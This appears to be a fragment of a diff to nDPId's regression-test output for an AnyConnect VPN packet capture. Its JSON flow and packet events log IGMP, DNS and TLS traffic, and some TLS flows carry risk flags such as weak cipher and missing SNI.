00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569687241452,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":56,"pkt_l4_len":8,"thread_ts_msec":1569687241452,"pkt":"AQBeAAABLH6BsEqhCABGwAAgGHkAAAECIZ0KAAAB4AAAAZQEAAARCu71AAAAAGluZyBzeXNjZmc="}
00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
@@ -20,14 +20,14 @@
00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569687241657,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687241657,"pkt":"AQBeAAD7pHczjPFACABGwAAgAABAAAEC+IcKAACV4AAA+5QEAAAWAAkE4AAA+w=="}
00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"}
00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569687242271,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242271,"pkt":"AQBefwMWpHczjPFACABGwAAgAABAAAEC5m0KAACV7\/8DFpQEAAAWAPbp7\/8DFg=="}
00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569687242476,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242476,"pkt":"AQBef\/\/6pHczjPFACABGwAAgAABAAAEC6YgKAACV7\/\/\/+pQEAAAWAPoE7\/\/\/+g=="}
00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"}
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569687244524,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687244524,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569687245251,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245251,"pkt":"LH6BsEqhNDY7z3UoCABFAABE1h4AAP8RQxAKAADjS0tMTM6PADUAMDW7jEkBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAQ=="}
@@ -44,26 +44,26 @@
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569687245366,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1569687245366,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADYRod5LS0xMCgAA4wA183IAgYoMLLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="}
00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"}
00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}}
01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5SAbt7aDL2a\/IufIAYEADmYwAAAQEIChwNezsCYFg6FwMDADwAAAAAAAAAA\/6MZ3K3UnwgKSolneP\/V\/Ul5QfA4HWbTZY4CgoWP92J0WcPzatLmBPNGkrfeEXB3KaiGuM="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569687245649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245649,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0y8JAACsGUUw0JfOtCgAA4wG73lNw7dXlH\/3wH4AQAAnwQQAAAQEICgCNhOgcDXs7"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569687245653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245653,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0VN5AACoGyTA0JfOtCgAA4wG73lJr8i58e2gzN4AQAAkgwQAAAQEICgJgYHkcDXs7"}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245688,"flow_last_seen":1569687245688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245688,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"}
00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}}
